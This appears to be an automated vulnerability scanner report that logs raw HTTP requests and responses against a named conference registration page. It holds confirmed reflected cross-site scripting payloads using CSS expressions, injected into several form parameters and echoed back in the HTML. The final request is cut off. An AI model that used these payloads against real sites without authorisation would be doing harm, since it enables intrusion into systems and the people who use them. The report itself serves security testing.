POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=66e89735401d4fabade7daf139793439
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=65jaf16uaqm929tslqqomhi7t5
Content-Length: 1163
Accept-Encoding: gzip, deflate

--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="action"

submit
--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="eventid"

19301
--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="categoryid"

65410
--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="language"

eng
--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="reference"

3
--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="eb"

" stYle="x:expre/**/ssion(netsparker(9))
--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="admin"

-1
--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="bridgeid"

3
--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="discountcode"

3
--66e89735401d4fabade7daf139793439
Content-Disposition: form-data; name="selectcategoryid"

65410
-----------------------------7db109117a156e--
--66e89735401d4fabade7daf139793439--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:30:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=09ki3sa45po42rgsderma5qo36; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3103
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [cat] => 1 [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST 3
eb POST 3
admin POST " stYle="x:expre/**/ssion(alert(9))
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST 65410 -----------------------------7db109117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=d275d652a52043f38b99e72d66575563
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=13rfbbakr74rnkqjokov85ivl4
Content-Length: 1162
Accept-Encoding: gzip, deflate

--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="action"

submit
--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="eventid"

19301
--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="categoryid"

65410
--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="language"

eng
--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="reference"

3
--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="eb"

3
--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="admin"

" stYle="x:expre/**/ssion(netsparker(9))
--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="bridgeid"

3
--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="discountcode"

3
--d275d652a52043f38b99e72d66575563
Content-Disposition: form-data; name="selectcategoryid"

65410
-----------------------------7db109117a156e--
--d275d652a52043f38b99e72d66575563--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:30:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=qp0em9ahteb5nofocqcm0d7dv2; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3100
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="bridgeid" value="3" /><!--Array( [cat] => 1 [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST " stYle="x:expre/**/ssion(alert(9))
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST 65410 -----------------------------7db109117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=7e45511ce6064fda966c20570015017f
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=o9k6tnii463t38ammsno10lsf1
Content-Length: 1163
Accept-Encoding: gzip, deflate

--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="action"

submit
--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="eventid"

19301
--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="categoryid"

65410
--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="language"

eng
--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="reference"

3
--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="eb"

3
--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="admin"

-1
--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="bridgeid"

" stYle="x:expre/**/ssion(netsparker(9))
--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="discountcode"

3
--7e45511ce6064fda966c20570015017f
Content-Disposition: form-data; name="selectcategoryid"

65410
-----------------------------7db109117a156e--
--7e45511ce6064fda966c20570015017f--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:31:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=pihptj1utrddge3bch1at5c7j5; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3102
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><!--Array( [cat] => 1 [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST " stYle="x:expre/**/ssion(alert(9))
eb POST 3
admin POST -1
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST 65410
x POST 0
y POST 0 -----------------------------7db13e117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
